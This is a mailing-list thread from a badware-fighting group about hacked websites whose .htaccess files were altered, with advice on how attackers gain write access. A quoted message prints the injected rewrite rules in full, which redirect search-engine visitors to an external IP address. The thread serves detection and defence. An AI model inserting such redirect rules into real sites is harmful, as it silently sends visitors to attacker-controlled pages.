All they need to do is get their PHP script to run on your server.
That will allow them to write or modify files, including .htaccess.
They can do that with a Remote File Inclusion (RFI) attack. Those
would show in your site logs.
A security hole in Drupal or other software would allow them to upload
a script (such as for a forum message attachment, avatar, etc.), and
then run it.
Chances are good it was done by script.
The .htaccess code provided by Anirban does prevent anyone from
viewing your .htaccess file with their browser, but it won't prevent
modifying the file with PHP or by FTP. On some server configurations,
a malicious "neighbor" on your shared server could also conduct a PHP
attack that would be able to modify your files. If a shared server got
severely compromised, the attackers could get access to all the sites
on it. You could check whether other sites on your server are also
flagged/compromised.
.htaccess must have permissions of 644, same as any other file. If
it's locked down any tighter than that, Apache itself won't be able to
read it, which will generate errors.
Reading it isn't really the problem, anyway. They are able to write to
it, which means there is a security hole somewhere.
On Nov 20, 12:05 pm, Jesse Nicola <[EMAIL PROTECTED]> wrote:
> Yep.
>
> What I want to know is how they are getting such widespread access to
> .htaccess files, and what we can do to prevent this!
>
>
>
> UseShots wrote:
> > Thanks Jesse,
>
> > Here is the code inserted into .htaccess
> > -------------
> > RewriteEngine On
> > RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
> > RewriteRule .*http://89.28.13.202/in.html?s=ix[R,L]
> > -------------
>
> > As you can see it only redirects search engine traffic. Site owners
> > usually unaware about this until someone tells them.
>
> > Denis
> >http://www.UnmaskParasites.com- Hide quoted text -
>
> - Show quoted text -
--~--~---------~--~----~------------~-------~--~----~
You received this message through the Google Groups "stopbadware" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[EMAIL PROTECTED]
For more options, visit this group at
http://groups.google.com/group/stopbadware?hl=en
-~----------~----~----~----~------~----~------~--~---
